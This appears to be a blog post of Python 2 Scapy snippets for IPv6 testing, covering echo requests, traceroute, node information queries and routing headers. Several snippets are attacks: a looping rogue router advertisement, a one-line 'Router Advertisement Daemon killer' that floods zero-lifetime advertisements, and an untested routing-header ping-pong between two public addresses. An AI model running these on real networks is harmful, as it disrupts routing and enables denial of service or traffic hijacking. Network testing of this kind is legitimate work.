[Python] Scapy IPv6 ICMP

This is some Scapy code for testing IPv6 enviroments and devices.

  • ICMP IPv6 request
	i=IPv6()
	i.dst="2001:db8:dead::1"
	q=ICMPv6EchoRequest()
	p=(i/q)
	sr1(p)
  • IPv6 source route packets
	i=IPv6()
	i.dst="2001:db8:dead::1"
	h=IPv6ExtHdrRouting()
	h.addresses=["2001:db8:dead::1","2001:db8:dead::1","2001:db8:dead::1"]
	p=ICMPv6EchoRequest()
	pa=(i/h/p)
  • Routing Header Example
	a = sr1(IPv6(dst="2001:4f8:4:7:2e0:81ff:fe52:9a6b")/ \
	IPv6ExtHdrRouting(addresses=["2001:78:1:32::1", "2001:20:82:203:fea5:385"])/ \
	ICMPv6EchoRequest(data=RandString(7)), verbose=0)
	a.src
  • Traceroute
	waypoint = "2001:301:0:8002:203:47ff:fea5:3085"
	target = "2001:5f9:4:7:2e0:81ff:fe52:9a6b"
	traceroute6(waypoint, minttl=15 ,maxttl=34,l4=IPv6ExtHdrRouting(addresses=[target])/ICMPv6EchoRequest(data=RandString(7)))
  • Current high score (not tested)
      addr1 = "2001:4830:ff:12ea::2"
      addr2 = "2001:360:1:10::2"
      zz=time.time();
      a=sr1(IPv6(dst=addr2, hlim=255)/IPv6ExtHdrRouting(addresses=[addr1, addr2]*43)/ICMPv6EchoRequest(data="staythere"), verbose=0, timeout=80);
      print "%.2f seconds" % (time.time() - zz)
  • IPv6 NA (version 1)
	sendp(Ether()/IPv6()/ICMPv6ND_RA()/ ICMPv6NDOptPrefixInfo(prefix="2001:db8:cafe:deca::", prefixlen=64)/ ICMPv6NDOptSrcLLAddr(lladdr="00:b0:de:ad:be:ef"), loop=1, inter=3)
  • IPv6 NA (version 2)
	a=IPv6(nh=58, src='fe80::214:f2ff:fe07:af0', dst='ff02::1', version=6L, hlim=255, plen=64, fl=0L, tc=224L)
	b=ICMPv6ND_RA(code=0, chlim=64, H=0L, M=0L, O=0L, routerlifetime=1800, P=0L, retranstimer=0, prf=0L, res=0L, reachabletime=0, type=134)
	c=ICMPv6NDOptSrcLLAddr(type=1, len=1, lladdr='00:14:f2:07:0a:f1')
	d=ICMPv6NDOptMTU(res=0, type=5, len=1, mtu=1500)
	e=ICMPv6NDOptPrefixInfo(A=1L, res2=0, res1=0L, L=1L, len=4, prefix='2001:db99:dead::', R=0L, validlifetime=2592000, prefixlen=64, preferredlifetime=604800, type=3)
	send(a/b/c/d/e)
  • The one line Router Advertisement Daemon killer
	send(IPv6(src=server)/ICMPv6ND_RA(routerlifetime=0), loop=1, inter=1)
  • Example 1
	someaddr=["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",
	"2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",
	"2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]
	
	for addr in someaddr: 
	  a = sr1(IPv6(dst=addr)/ICMPv6NIQueryName(data=addr), verbose=0)
	  print a.sprintf( "%-35s,src%: %data%")
  • Example 2
	someaddr=["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",
	"2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",
	"2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]
	
	for addr in someaddr: 
	  a = sr1(IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1"))
	  print a.sprintf( "%data%")

Enjoy !

Advertisements

Tagged: , , , ,

Leave a Reply :

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: